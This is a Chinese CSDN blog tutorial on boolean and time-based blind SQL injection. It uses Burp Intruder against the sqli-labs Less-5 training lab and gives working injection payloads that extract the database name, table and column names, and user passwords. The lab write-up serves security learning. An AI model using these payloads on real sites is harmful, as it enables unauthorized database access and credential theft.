SQL注入-盲注 Burp盲注方法

最新推荐文章于 2024-08-13 08:53:12 发布
最新推荐文章于 2024-08-13 08:53:12 发布
阅读量733 收藏 1
点赞数 1
分类专栏: WEB安全基础 文章标签: sql 数据库 网络 渗透测试 漏洞复现 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44971640/article/details/132669406
版权

文章目录

什么是盲注?

有时目标存在注入,但在页面上没有如何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注。

盲注种类:

盲注函数解析

length()函数:返回字符串的长度
?id=1 and length(database()) > 1

substr()函数:截取字符串,从第一位截取一个
?id=1 and substr(database(),1,1) = 'a'
substr(1,2,3)
第一个参数代表是我们截取的字符串
第二个参数代表截取的位数
第三个参数代表的是截取个数

limit 0,1
0代表第一位
1代表个数

时间型盲注
sleep() 将程序挂起一段时间n为n秒

if(expr1,expr2,expr3)判断语句 如果第一个语句正确就执行,第二个语句错误就执行第三个语句
?id=1' and if(length(database())=8,10,sleep(5)) --+

ascii()、ord():返回字段的ascll码值

**靶场sqli-labs - Less 5

判断库名位数

由length()函数判断可知,库名位数为8

?id=1' and length(database())=8 --+

Burp 抓取数据包

发送GET请求抓取数据包并发送到 intruder 模块

http://192.168.174.128:8081/Less-5/?id=1' and ascii(mid(database(),1,1)) = 97 --+

设置payload位置

‘1’ 代表的是截取的位数,'97’代表 ASCII 码表 总数为127,攻击类型设置:ClusterBomb

设置payload 1

payload set 设置为 ‘1’ ,payload type 设置为数值(number),payload选项设置 from 1 to 8. 间隔为1

设置payload 2

payload set 设置为 ‘1’ ,payload type 设置为数值(number),payload选项设置 from 1 to 126. 间隔为1,因为ASCII码数量总数为127

点击开始攻击

发现存在8位数,ASCII码分别对应:‘115’ ‘101’ ‘99’ ‘117’ ‘114’ ‘105’ ‘116’ ‘121’ 解码分析分别对应:‘s’ ‘e’ ‘c’ ‘u’ ‘r’ ‘i’ ‘t’ ‘y’ ,所以得到了库名为:“securtiy”

判断库名下表名的位数

由length()函数判断可知,表名位数为6

?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+

Burp 抓取数据包

发送GET请求抓取数据包并发送到 intruder 模块

?id=1' and ascii(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=1 --+

点击开始攻击

发现存在6位数,ASCII码分别对应:‘101’ ‘109’ ‘97’ ‘105’ ‘108’ ‘115’ 解码分析分别对应:‘e’ ‘m’ ‘a’ ‘i’ ‘l’ ‘s’ ,所以得到了表名为:“emails”

判断库名下第二张表名

?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=x --+

?id=1' and ascii(mid((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=x --+

判断表名下的字段名

?id=1' and length((select column_name from information_schema.columns where table_name='users' limit 0,1))=x --+

?id=1' and ascii(mid((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=x --+

判断表中具体数据

?id=1' and length((select password from users limit 0,1))>1 --+

?id=1' and ascii(mid((select password from users limit 0,1),1,1))=68 --+
渗透测试小白
关注
专栏目录
SQL时间盲注
JieDG的博客
05-20 1137
时间盲注 时间盲注代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,语句执行后也不提示真假,我们不能通过页面的内容来判断。这里我们可以通过构造语句,通过页面响应的时长,来判断信息,这既是时间盲注 时间盲注常用函数 left(m,n) --从左向右截取字符串m返回其前n位 substr(m,1,1) --取字符串m的左边第一位起,1字长的字符串 ascii(m) --返回字符m的ASCII码 if(str1,str2,str3)--如果str1正确就执行str2,否则执行str3 sleep
BurpSuite官方实验室】SQL联合注入
weixin_52137383的博客
03-23 4858
1.Determining the number of columns required in an SQL injection UNION attack To carry out an SQL injection UNION attack, you need to ensure that your attack meets these two requirements. This generally involves figuring out: How many columns are being r
SQLiPy: Burp Suite 的强大 SQL 注入检测插件
最新发布
gitblog_00963的博客
08-13 378
SQLiPy: Burp Suite 的强大 SQL 注入检测插件 sqlipySQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.项目地址:https://gitcode.com/gh_mirrors/sq/sqlipy 1. 项目介绍 项目概览 SQLiPy 是一款专为 Bu...
使用burpsuit工具进行sql盲注
m0_37570494的博客
01-25 2253
burpsuit抓包,改包工具,可以通过修改所抓取的url请求信息,来达到sql注入的目的: 1、选择要盲注的url进行burp抓包: 2、注入的内容用ASCII()函数进行转换成对应的ASCII值,才能进行此处的数字破解,类型为numebers,0-127范围内,步长为1,此为burpsuit里面一个模块,用于密码破解使用: 3、不断修改substr()函数中数字位置,执行burp的attack,观察结果不一样的地方,此时ascii值为100,找到对应的值,也就是,当找到密码时,此处请求返.
布尔盲注运用burp的操作
qq_51954912的博客
04-03 1016
burp的骚操作这次依旧拿八关下饭 (小声bb,我又水一篇博客) 这次依旧拿八关下饭 因为已经写过一次了就不再判断闭合符号了直接爆破判断 1.先判断字段 由图知从3开始长度就不一样,说明字段为三 爆数据库名称 第二位为101即为e 得知数据库的第一个字母的ascii码为115,即s后面的名字和这一步的方法差不多 爆表的数量 如上图,即可了解表的数量为4 爆表名如下图,第一个表的第一个字母为e 但是我们需要找到首字母为u的user表 第二个表的首字母 。。。。。。 第四个表首字母 找到了那么用burp
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4674
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
盲注
weixin_53026460的博客
10-24 3195
盲注属于SQL注入的一种,SQL注入可以通过不同的类别来分类,比如按照传参方式分类SQL注入:GET、POST、HEAD(COOKIE),根据做法的不同,我们也可以把这些分类为盲注、报错注入和显错注入;盲注是什么?(一)布尔盲注布尔是一种类型,核心是在于判断正确与否。布尔就是指这个页面有回显,但是不会显示具体内容,只会显示语句是否正常执行;举个例子,这是一条存在sql注入的语句;在这里输入and 1=1;会发现页面显示有数据;将and 1=1修改为and 1=1;
SQL注入---盲注
qq_41592307的博客
09-04 594
盲注 1、盲注的原理 屏蔽了报错信息,攻击者无法使用报错信息来进行注入判断。 2、盲注的类型 1. Boolean盲注:无论输入什么只会显示真与假 2. 时间盲注:页面有任何的显示,通过时间的延迟来判断是否存在注入 3、Boolean盲注 3.1、什么是Boolean盲注? 是无论输入什么,结果只返回真和假两种结果。 3.2、Boolean盲注的判断方式 判断数据库名的长度:length(database())>=x ...
0x04-SQL注入-盲注
0pr
05-25 293
目录 今日目标 可以学到什么? SQL 盲注 什么是 SQL 盲注? 如何使用带有空格的请求头? 如何使用 UNION 模糊测试数据表有多少列? SQLite 及 SQL 的 schema 如何利用这个漏洞SQLite 验证 参考链接 今日目标 Christmas Special. 正式进入 4 星俱乐部 ???? 可以学到什么? SQL 盲注 本篇的主题,是 SQL 盲注。先了解一下 SQL 盲注是什么,再学习如何进行模糊测试,最后获取到想要的数据。 什么是 SQL
封神台SQL注入-盲注
qq_40941912的博客
10-05 790
一、原理 所谓的盲注就是在服务器有错误回显的时候完成的注入攻击。 服务器有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 布尔型盲注 => 通过GET/_GET/G​ET/_POST传参获取后台数据库内容,并且可以通过URL栏/登录框进行SQL代码注入的 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 二、作业 (一) SQ
SQL注入--报错和盲注
qq_57307348的博客
02-10 1919
回顾之前的文章(sql注入基础),了解到sql注入的分类有 基于正常回显 联合查询 union select 基于错误回显 floor() extractvalue()   updatexml() 盲注 布尔型盲注 基于时间盲注sleep() 报错注入的前提 页面上有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点: 不需要显示位 缺点: 需要输出mysql_error()的...
burp-盲注测试技巧
05-03
burp盲注测试技巧
sql注入--盲注(布尔、时间、报错)
糖小喵
04-15 742
布尔--构造逻辑判断 函数: https://www.cnblogs.com/lcamry/p/5504374.html mid():此函数为截取字符串一部分。 str="123456"mid(str,2,1)结果为2 substr(): Left(): ...
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 5618
BurpSuit官方实验室靶场-SQL注入通关记录。
Burp+sqlmap测试SQL注入
香蕉~不拿呐
08-03 2088
免责声明: 此文章仅用于学习研究使用,请勿用于违法犯罪,请遵守《网络安全法》等相关法律法规。 Burp+sqlmap测试SQL注入 本文主要讲述Burpsqlmap工具联动测试SQL注入 环境准备 具有python环境 系统中有sqlmap Burp插件安装: 先下载好jython.jar文件https://www.jython.org/download.html 在Burpsuite的Extender中添加jython路径 在BApp Store中安装sqlmap 在SQLipy模.
burp 官方靶场 第二章 sql注入
2301_78362619的博客
02-01 1087
要在每个位置测试字符,您需要在您定义的有效负载位置发送合适的有效负载。或者,您可以创建一个具有两个有效载荷位置和“集束炸弹”攻击类型的单个入侵者攻击,并通过偏移量和字符值的所有排列进行工作。现在,您只需对密码中的其他每个字符位置重新运行攻击,以确定它们的值。为此,请返回到主Burp窗口和Burp Intruder的Positions选项卡,并将指定的偏移量从1更改为2。当条件不再为真时(即“欢迎回来”消息消失时),您已经确定了密码的长度,实际上是20个字符长。该行显示的有效载荷是第一个位置的字符的值。
使用BurpSuite实验室练习SQL注入攻击
Brisbane的博客
04-12 4501
因为之前对HTTP和Java都不熟悉,所以想要一开始就使用实验室师兄给的在线平台练习有点困难。好在我在一本参考书上看到推荐使用BurpSuite的在线实验室,又因为前段时间我恰好学习了Burp网络扫描相关,于是我尝试着利用这个软件进一步的学习WEB的网络安全。后来发现上面的练习难度适中,并且既有原理说明,又有操作指导,强烈推荐像我这样的新手入门使用。 这周首先学习的是SQL注入攻击的第一部分。实...
使用Burp Suite和Python进行自动化漏洞挖掘—SQL测试注入插件
鹅子鱼的博客:很菜但是很好学的小菜鸟
05-09 2351
每次测注入都是用burp的Intruder模块,很不方便就是批量跑批量测哪些有过滤。懒人鹅上线,准备搞一个sql测试的插件本篇文章代码量大,基础可以去看上一篇。
SQLMap4Burp-Plus-Plus:自动化SQL注入神器
gitblog_00075的博客
04-13 347
SQLMap4Burp-Plus-Plus:自动化SQL注入神器 项目地址:https://gitcode.com/c0ny1/sqlmap4burp-plus-plus 在网络安全领域,渗透测试是一项至关重要的任务,它帮助我们发现并修复系统的漏洞。而SQL注入是一种常见的web安全问题,利用这种漏洞,攻击者可以操控数据库,获取敏感信息。为了解决这个问题,开发者c0ny1创建了一个强大的工具——...
burpsuite sql注入漏洞测试(布尔盲注)
07-27
当使用Burp Suite进行SQL注入漏洞测试时,布尔盲注是一种常用的技术之一。布尔盲注是一种盲注攻击技术,它通过在SQL查询中使用布尔逻辑来确定数据库中的信息。以下是一些步骤来测试布尔盲注漏洞: 1. 配置Burp Suite:首先,确保已正确配置Burp Suite以拦截和修改HTTP请求和响应。您可以在Burp Suite的Proxy选项卡下设置代理,并根据需要配置浏览器或应用程序以使用该代理。 2. 找到注入点:使用Burp Suite的Spider或Repeater工具来找到潜在的注入点。这可以是URL参数、表单字段或Cookie值等。 3. 构造注入语句:使用布尔盲注技术,构造适当的注入语句来测试漏洞。例如,您可以尝试通过在WHERE子句中使用布尔逻辑来判断条件是否为真或假来确定数据库中的信息。 4. 检测响应差异:发送经过注入处理的请求,并观察响应是否有所不同。如果响应正常,可能意味着注入失败;如果响应出现错误或有其他差异,可能意味着注入成功。 5. 使用布尔逻辑验证条件:根据不同的响应,使用布尔逻辑来验证条件是否为真或假。例如,您可以通过在注入语句中使用AND或OR运算符来检查条件。 6. 执行进一步的测试:根据验证的结果,您可以进一步探测和利用漏洞。使用Burp Suite的其他工具和插件来自动化和加快测试过程。 请注意,在进行任何安全测试之前,确保您已获得适当的授权,并仅在合法范围内进行测试。此外,始终遵循道德黑客和安全测试的最佳实践。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试小白

如果您觉得满意,一分一毛也是爱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值